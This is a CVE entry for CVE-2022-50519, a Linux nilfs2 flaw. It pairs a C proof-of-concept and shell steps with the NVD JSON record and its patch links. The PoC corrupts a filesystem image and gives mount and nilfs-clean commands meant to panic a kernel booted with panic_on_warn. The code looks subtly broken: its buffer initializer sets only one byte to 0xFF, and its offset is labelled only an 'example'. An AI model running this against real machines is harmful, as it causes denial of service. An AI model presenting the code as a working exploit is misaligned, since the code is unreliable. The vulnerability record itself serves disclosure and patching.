CVE-2022-50519

// PoC: Trigger nilfs2 checkpoint failure to cause kernel panic // This PoC demonstrates how to trigger the vulnerability by creating // a corrupted nilfs2 filesystem image with invalid checkpoint metadata. // Run with a kernel booted with panic_on_warn=1 to observe the panic. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/mount.h> /* * Steps to reproduce: * 1. Create a nilfs2 filesystem image * $ dd if=/dev/zero of=nilfs.img bs=1M count=100 * $ mkfs.nilfs2 nilfs.img * * 2. Corrupt the checkpoint metadata area in the image * (e.g., modify the checkpoint file's segment summary) * * 3. Mount the corrupted image with loop device * $ sudo losetup /dev/loop0 nilfs.img * $ sudo mount -t nilfs2 /dev/loop0 /mnt/nilfs * * 4. Trigger checkpoint operation * $ sudo nilfs-clean /mnt/nilfs * or perform filesystem operations that trigger checkpoint * * 5. On vulnerable kernel with panic_on_warn=1, system will panic */ int main(int argc, char *argv[]) { if (argc < 2) { fprintf(stderr, "Usage: %s <nilfs_image>\n", argv[0]); return 1; } const char *image = argv[1]; int fd = open(image, O_RDWR); if (fd < 0) { perror("open"); return 1; } /* Corrupt checkpoint metadata - offset depends on nilfs2 layout */ /* The checkpoint file area typically starts after the superblock */ off_t cp_offset = 0x1000; /* example offset */ unsigned char corrupt_data[4096] = {0xFF}; /* invalid metadata */ if (pwrite(fd, corrupt_data, sizeof(corrupt_data), cp_offset) < 0) { perror("pwrite"); close(fd); return 1; } printf("Checkpoint metadata corrupted at offset %ld\n", cp_offset); printf("Now mount the image to trigger the vulnerability:\n"); printf(" sudo losetup /dev/loop0 %s\n", image); printf(" sudo mount -t nilfs2 /dev/loop0 /mnt/nilfs\n"); printf(" sudo nilfs-clean /mnt/nilfs # trigger checkpoint\n"); close(fd); return 0; }

{"cve": {"id": "CVE-2022-50519", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:35.610", "lastModified": "2026-03-17T14:13:35.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: replace WARN_ONs by nilfs_error for checkpoint acquisition failure\n\nIf creation or finalization of a checkpoint fails due to anomalies in the\ncheckpoint metadata on disk, a kernel warning is generated.\n\nThis patch replaces the WARN_ONs by nilfs_error, so that a kernel, booted\nwith panic_on_warn, does not panic. A nilfs_error is appropriate here to\nhandle the abnormal filesystem condition.\n\nThis also replaces the detected error codes with an I/O error so that\nneither of the internal error codes is returned to callers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.30", "versionEndExcluding": "4.9.331", "matchCriteriaId": "068F561C-725E-4CD5-AB33-06B14EAD1591"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", "matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.218", "matchCriteriaId": "ED2FAD62-84D0-451F-9F4D-66173BBD59E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.148", "matchCriteriaId": "A125CF4C-603D-4ED4-AE18-CFC7C8D5CCF1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.74", "matchCriteriaId": "381A1822-66FA-4BF1-BCA9-7AF2DFCFFBE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.16", "matchCriteriaId": "950EB0FE-7220-47B0-A80D-CEFD803A69C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.2", "matchCriteriaId": "B0624AD1-5A88-463E-96D1-F938FCBA6EEA"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/090fcfb6edeb9367a915b2749e2bd1f8b48d8898", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/259c0f68168ac6a598db3486597b10e74d625db0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5c0776b5bc31de7cd28afb558fae37a20f33602e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/723ac751208f6d6540191689cfbf6c77135a7a1b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8a18fdc5ae8e6d7ac33c6ee0a2e5f9f1414ef412", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ae16440c44ae2acda6d72aff9d74eccf8967dae5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b63026b5e13040cd5afa11769dd0d9e1504b031a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bf98be80cbe3b4e6c86c36ed00457389aca3eb15", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c0c3d3d3ea41cb5228ee90568bb953f9a56c3227", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}